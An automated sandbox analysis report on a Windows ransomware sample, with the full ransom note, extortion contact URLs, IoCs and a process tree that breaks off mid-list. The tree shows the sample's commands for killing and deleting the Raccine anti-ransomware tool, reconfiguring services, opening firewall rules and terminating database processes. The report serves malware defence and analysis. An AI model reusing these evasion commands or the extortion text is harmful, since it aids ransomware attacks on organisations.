8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

Resubmissions

16-03-2022 13:15

220316-qg979accak 10

12-05-2021 00:06

210512-y1glnyls5e 10

Analysis

max time kernel
50s
max time network
75s
platform
windows10_x64
resource
win10v20210408
submitted
12-05-2021 00:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e1f063d6_by_Libranalysis.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: Cfv75bCgb5xdTHABcYnKB/zazCJNIKvRCaHtGGOoCNr1vxNe2mecLIfSaD2dv0wg32RjzEO3gkQyATSEuWTRjpalK86tit8XK5t5fxThti02KcvpUngIGC7xiyfRGm6+zvysqyoBUB3JNeupJypQ89cKmSiREkNTUZDDToARKMuz7/BVcnEqO/QyRi4cPwNj/flV2Sq4Z2Pf60MriYdfrR5ukAa4cUIiU+nSQ3fYHKCPBhadeCgVBPgZ35miiPhwZv1FJMXt3Qp4atsf7I3OSSpCeAUHs4H236FECFoBOXj9dSUYRYBp/saZ2wJHX03wSnp5dXTV1zpmRAwYrEZCZ37LvtN+JrV2Vt2i7Jm9uOLkqNrmCCtRZpmNDgfwqvUVJejvW75944dEkaZvEK/PQ6nrlSu84HCd6UAzMDovnCtw3XmhqrRsreFOoRkTNUM79qthY9IaSDe+6A0Av1bFJHz74JZn9riULB6wQzSbIbplGwaggvzUS+GtLrdNthZrpIMoQra2DriK/mRVDEAmE9YPGF89XC71DwjHe1WA0kWboxjwzcZEjGDG5WMPrdru4j/jt6IpTJvPUnOJ1VCOGJ2Sder9SfF3HdrRr+aZVV5JsJLPWqwKLnm0HE9cpkoruHVQh6vMA8+ZIlz1eUyTvGrRPDJlBo0ytSDsBluNWyo=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: Cfv75bCgb5xdTHABcYnKB/zazCJNIKvRCaHtGGOoCNr1vxNe2mecLIfSaD2dv0wg32RjzEO3gkQyATSEuWTRjpalK86tit8XK5t5fxThti02KcvpUngIGC7xiyfRGm6+zvysqyoBUB3JNeupJypQ89cKmSiREkNTUZDDToARKMuz7/BVcnEqO/QyRi4cPwNj/flV2Sq4Z2Pf60MriYdfrR5ukAa4cUIiU+nSQ3fYHKCPBhadeCgVBPgZ35miiPhwZv1FJMXt3Qp4atsf7I3OSSpCeAUHs4H236FECFoBOXj9dSUYRYBp/saZ2wJHX03wSnp5dXTV1zpmRAwYrEZCZ37LvtN+JrV2Vt2i7Jm9uOLkqNrmCCtRZpmNDgfwqvUVJejvW75944dEkaZvEK/PQ6nrlSu84HCd6UAzMDovnCtw3XmhqrRsreFOoRkTNUM79qthY9IaSDe+6A0Av1bFJHz74JZn9riULB6wQzSbIbplGwaggvzUS+GtLrdNthZrpIMoQra2DriK/mRVDEAmE9YPGF89XC71DwjHe1WA0kWboxjwzcZEjGDG5WMPrdru4j/jt6IpTJvPUnOJ1VCOGJ2Sder9SfF3HdrRr+aZVV5JsJLPWqwKLnm0HE9cpkoruHVQh6vMA8+ZIlz1eUyTvGrRPDJlBo0ytSDsBluNWyo=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

ctkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exectkacaxe.exe

pid	process
1324	ctkacaxe.exe
1288	ctkacaxe.exe
1160	ctkacaxe.exe
3812	ctkacaxe.exe
3836	ctkacaxe.exe
3680	ctkacaxe.exe
2864	ctkacaxe.exe
3096	ctkacaxe.exe
1244	ctkacaxe.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	e1f063d6_by_Libranalysis.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1f063d6_by_Libranalysis.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3668	taskkill.exe
2808	taskkill.exe
1176	taskkill.exe
3096	taskkill.exe
3772	taskkill.exe
3812	taskkill.exe
1344	taskkill.exe
2196	taskkill.exe
2856	taskkill.exe
1704	taskkill.exe
2100	taskkill.exe
3716	taskkill.exe
2104	taskkill.exe
3588	taskkill.exe
3904	taskkill.exe
1424	taskkill.exe
3744	taskkill.exe
3632	taskkill.exe
492	taskkill.exe
3784	taskkill.exe
3908	taskkill.exe
628	taskkill.exe
3916	taskkill.exe
3892	taskkill.exe
3052	taskkill.exe
3764	taskkill.exe
3784	taskkill.exe
4052	taskkill.exe
1428	taskkill.exe
3768	taskkill.exe
1144	taskkill.exe
3012	taskkill.exe
3976	taskkill.exe
3804	taskkill.exe
3456	taskkill.exe
2252	taskkill.exe
3008	taskkill.exe
2752	taskkill.exe
2364	taskkill.exe
3984	taskkill.exe
1164	taskkill.exe
3920	taskkill.exe
3492	taskkill.exe
988	taskkill.exe
3824	taskkill.exe
496	taskkill.exe
1244	taskkill.exe
3252	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3976 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3824 PING.EXE

pid	process
3976	reg.exe

pid	process
3824	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid	process
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe
636	e1f063d6_by_Libranalysis.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

e1f063d6_by_Libranalysis.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	636	e1f063d6_by_Libranalysis.exe
Token: SeDebugPrivilege	3632	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeDebugPrivilege	492	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	3668	taskkill.exe
Token: SeDebugPrivilege	496	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	1344	taskkill.exe
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	3744	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	3824	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	3908	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	2100	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid process

636 e1f063d6_by_Libranalysis.exe
636 e1f063d6_by_Libranalysis.exe
636 e1f063d6_by_Libranalysis.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid process

636 e1f063d6_by_Libranalysis.exe
636 e1f063d6_by_Libranalysis.exe
636 e1f063d6_by_Libranalysis.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

description	pid	process	target process
PID 636 wrote to memory of 3632	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3632	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2856	636	e1f063d6_by_Libranalysis.exe	reg.exe
PID 636 wrote to memory of 2856	636	e1f063d6_by_Libranalysis.exe	reg.exe
PID 636 wrote to memory of 3976	636	e1f063d6_by_Libranalysis.exe	reg.exe
PID 636 wrote to memory of 3976	636	e1f063d6_by_Libranalysis.exe	reg.exe
PID 636 wrote to memory of 2888	636	e1f063d6_by_Libranalysis.exe	schtasks.exe
PID 636 wrote to memory of 2888	636	e1f063d6_by_Libranalysis.exe	schtasks.exe
PID 636 wrote to memory of 2960	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 2960	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 2736	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 2736	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3620	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3620	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 1508	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 1508	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 2248	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 2248	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3892	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3892	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3908	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3908	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 4024	636	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 636 wrote to memory of 4024	636	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 636 wrote to memory of 716	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 716	636	e1f063d6_by_Libranalysis.exe	sc.exe
PID 636 wrote to memory of 3096	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3096	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 492	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 492	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3772	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3772	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3716	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3716	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2104	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2104	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2252	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2252	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3812	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3812	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3588	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3588	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3668	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3668	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 496	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 496	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3008	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3008	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3984	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3984	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 1344	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 1344	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2752	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2752	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2196	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2196	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2856	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2856	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3784	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 3784	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 4052	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 4052	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2808	636	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 636 wrote to memory of 2808	636	e1f063d6_by_Libranalysis.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	e1f063d6_by_Libranalysis.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1f063d6_by_Libranalysis.exe

C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe
"C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:636
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:2856
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3976
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2888
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2960
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2736
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:3620
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1508
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2248
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3892
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3908
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4024
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3096
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:492
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3668
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3008
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\SYSTEM32\taskkill.exe
